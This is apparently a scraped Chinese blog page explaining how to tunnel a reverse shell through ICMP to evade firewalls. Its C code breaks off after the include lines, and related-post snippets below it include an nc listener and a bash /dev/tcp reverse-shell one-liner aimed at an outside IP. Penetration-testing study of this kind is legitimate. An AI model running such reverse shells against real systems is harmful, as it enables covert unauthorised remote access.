简述

网络管理员通常使用各种各样的防火墙,以拦截各类渗透测试动作,如某防火墙允许已知的机器流量在端口和服务(入口过滤),并拥有强大的出口访问控制列表的设置。然而很多时候,为了方便运维管理,在各种安全策略中,ICMP协议通常是不会过滤的,通俗点说就是不会禁PING。

ICMP(Internet Control Message Protocol)Internet控制报文协议,是TCP/IP协议簇的一个子协议,用于在IP主机、路由器之间传递控制消息。如果在目标主机建立一个shell的管道,通过ICMP数据部分来传输协议即可实现远控过程中所需的数据交互。

服务端代码

Windows服务端:

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <netinet/in.h>
#include <netinet/ip_icmp.h>
#include <netinet/ip.h>
#include <string.h>
#include <unistd.h>
#incl

利用ICMP协议反弹shell相关推荐

  1. c语言实现icmp协议ping命令,利用ICMP协议实现ping命令

    一.实现原理 ping利用ICMP协议包来侦测另一个主机是否可达.Ping的原理是使用了类型码为8的ICMP回送请求包,收到请求的主机则用类型码为0的ICMP回应报文.如果应答包和请求包的标示号.序号 ...

  2. linux 下ssh端口反弹,利用ssh隧道反弹shell

    说明 本文旨在分析rssh的源代码来学习利用ssh隧道来反弹shell.整个rssh只有1个347行的main文件,所以整体的逻辑结构也比较好分析.关于SSH端口转发的知识可以看实战SSH端口转发这篇 ...

  3. 利用ICMP协议,使用python原始套接字实现主机存活探测工具

    一.课题概述. 一学期一次的课程设计终于开始了(停课两周,马上放寒假了,哈哈哈哈哈哈...)这次我们课程设计的科目是计算机协议,我们小组抽到的题目是利用ICMP模仿ping命令写一个主机存活探测的工具 ...

  4. 利用msf实现反弹shell与提权(细节过程秒懂)

    环境 攻击机:Kali ip:192.168.50.183 靶机:Win7(x64) 两者在同一个C段!!!! 生成payload 首先我们生成一个payload文件,如果靶机是64位的建议生成64位 ...

  5. Windows下反弹shell的方法

    1.powercat反弹shell powercat(https://github.com/besimorhino/powercat )为Powershell版的Netcat,实际上是一个powers ...

  6. 渗透测试常用反弹shell方法(如何渗透测试反弹shell?)-Linux篇(゚益゚メ) 渗透测试

    文章目录 相关博客 反弹shell介绍 常用反弹方式 NetCat(NC)反弹 正向NC 反向NC Telnet反弹 正向shell 反向shell OpenSSL Curl 相关博客 Linux信息 ...

  7. python反弹shell_反弹shell的几种方式总结

    假设本机地址10.10.10.11,监听端口443. 1.Bash环境下反弹TCP协议shell 首先在本地监听TCP协议443端口 nc -lvp 443 然后在靶机上执行如下命令: bash -i ...

  8. 各种反弹shell方式

    1.Bash环境下反弹TCP协议shell 首先在本地监听TCP协议443端口 nc -lvp 443 然后在靶机上执行如下命令: 1 bash -i >& /dev/tcp/121.4 ...

  9. PING的原理以及ICMP协议

    主要内容: 1.ping的原理以及工作过程 2.ICMP协议 3.ICMP的应用:ping,traceroute 1.ping的原理以及工作过程  ping的原理  ping 程序是用来探测主机到主机 ...

最新文章

  1. python中的装饰器有哪些-python中的装饰器
  2. C++ File IO
  3. squid ldap认证(AD)
  4. python PyQt5中文教程☞【第八节】PyQt5控件(II)
  5. SQL判断NULL的几种常见方式
  6. Java通过ftp上传文件
  7. python实现解释器_Python 解释器初探
  8. 解决oracle客户端乱码问题,如何解决oracle客户端中文乱码问题?-Oracle
  9. SQL Server中的零碎数据库还原
  10. Visual Studio开发工具(5):VS2010 精美壁纸,总有一款适合你!
  11. Waud.js – 使用HTML5降级处理的Web音频库
  12. 消息 15135,级别 16,状态 8,过程 sp_addextendedproperty,对象无效。不允许有扩展属性,或对象不存在。...
  13. PHP瓜分两个数组的相同元素和不同元素的两种方法
  14. Baxter 机器人仿真软件安装及演示
  15. 【操作系统】TCP流式传输、UDP数据报传输
  16. 查询课程数mysql_mysql_数据查询练习
  17. pygame战棋游戏制作之战棋光标设置上(三)
  18. 计算机电源负载能力差,电脑电源问题:电脑电源负载能力差的原因及解决方法...
  19. 实现登录和用户信息组件的按需展示
  20. 逆战无法修复服务器,逆战登录时的各种问题 这些问题该如何解决?

热门文章

  1. JAVA练习题23:身份证信息查看
  2. 教育培训机构官网站源码留学签证学校美国教育全屏大气
  3. Java变量的声明和赋值
  4. 每日一点专业英文2017.4.19
  5. if语句的三种形式及嵌套
  6. 测速的c语言程序,光电码盘测速C程序
  7. 虚拟机中Windows server 2022找回开机密码
  8. mongodb忘记密码怎么办?
  9. 微信又双叒更新啦!新增朋友圈视频动态封面,还有这些实用的功能!
  10. 什么样的命名才是合理的?谈命名的原则